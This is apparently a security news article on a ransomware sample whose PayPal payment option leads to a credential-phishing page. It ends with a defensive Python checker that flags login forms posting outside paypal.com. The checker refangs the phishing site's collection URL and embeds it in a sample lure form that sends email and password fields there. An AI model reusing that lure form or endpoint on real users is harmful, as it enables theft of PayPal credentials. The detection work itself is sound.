Ransomware is usually after one thing only, and that’s encrypting the victim’s data and extorting payment for its decryption. However, a new piece of ransomware which is still in a development stage adds something else to its malicious activity – a PayPal phishing page.
The ransomware in question is not only attempting to encrypt the user’s data but also to harvest their PayPal credentials.
Ransomware Utilizes Phishing Technique
The ransomware, which was discovered by MalwareHunterTeam, is not an advanced piece, but it does include a cleverly crafted ransom note. The note lets the victim choose a payment method: either a Bitcoin address or PayPal. The PayPal option was likely added to make payment look easier for victims who are not familiar with Bitcoin.
As it turns out, choosing PayPal is not a good idea, as the victim is taken to a phishing page carefully crafted to steal their PayPal login credentials:
The phishing page is quite convincing and closely resembles the real PayPal login page. However, a closer look shows that any submitted information is not sent to the official website of the service but to https://ppyc-ve0rf(.)890m(.)com/s2(.)php. The phishing page also presents a second form that attempts to collect further personal details from the unsuspecting victim.
Interestingly, once all the necessary info has been shared with the phishers, the phishing page says that the account has been unlocked and redirects the victim to the actual PayPal login page.
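The tell-tale sign of the lure described above is a login form whose action posts the submitted fields to a host that is not the brand's own. The following check, an added example that is not code from the article or from the researchers it cites, extracts every form action from a page and flags the off-brand ones; the sample page, its serving URL and the refanging of the article's defanged indicator are constructed for the demonstration.

```python
"""Flag HTML forms that would deliver submitted credentials off-brand."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# The indicator as printed in the article (defanged); refanged only inside this script.
DEFANGED_ACTION = "https://ppyc-ve0rf(.)890m(.)com/s2(.)php"


def refang(indicator: str) -> str:
    """Turn the '(.)' and 'hxxp' defanging conventions back into a parseable URL."""
    return indicator.replace("(.)", ".").replace("hxxp", "http")


class FormActionParser(HTMLParser):
    """Collect the action attribute of every <form> element on the page."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action") or "")


def is_brand_host(host: str, brand_domain: str) -> bool:
    """Accept the brand domain or a real subdomain of it only, so a look-alike
    such as 'paypal.com.evil.invalid' is rejected."""
    return host == brand_domain or host.endswith("." + brand_domain)


def suspicious_form_actions(html: str, page_url: str, brand_domain: str = "paypal.com") -> list:
    """Return the absolute form targets that post submitted fields outside brand_domain."""
    parser = FormActionParser()
    parser.feed(html)
    flagged = []
    for action in parser.actions:
        # A relative action posts back to the host serving the page, so resolve it first.
        target = urljoin(page_url, action)
        host = (urlparse(target).hostname or "").lower()
        if not is_brand_host(host, brand_domain):
            flagged.append(target)
    return flagged


# Constructed lure page: a look-alike login form posting to the article's indicator.
SAMPLE_PAGE_URL = "https://ransom-note.invalid/paypal.html"  # placeholder, not a real host
SAMPLE_LURE_HTML = f"""<html><body>
<form method="post" action="{refang(DEFANGED_ACTION)}">
  <input name="login_email"><input name="login_password" type="password">
</form></body></html>"""

if __name__ == "__main__":
    for target in suspicious_form_actions(SAMPLE_LURE_HTML, SAMPLE_PAGE_URL):
        print("credential sink outside paypal.com:", target)
```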
This is yet another example of cybercriminals getting smarter in their ways to trick victims into revealing personal information, while also encrypting all of their files. Perhaps we will witness more innovative approaches to the well-known ransomware threat in 2019.